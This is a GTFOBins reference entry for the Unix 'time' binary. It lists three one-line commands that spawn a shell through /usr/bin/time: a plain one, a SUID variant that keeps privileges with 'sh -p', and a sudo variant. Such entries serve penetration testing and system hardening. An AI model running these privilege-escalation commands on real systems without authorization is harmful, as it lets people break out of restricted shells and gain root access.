GTFOBins.github.io/_gtfobins/time.md

334 B

description functions
Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
execute-interactive suid-enabled sudo-enabled
code
/usr/bin/time /bin/sh
code
./time /bin/sh -p
code
sudo /usr/bin/time /bin/sh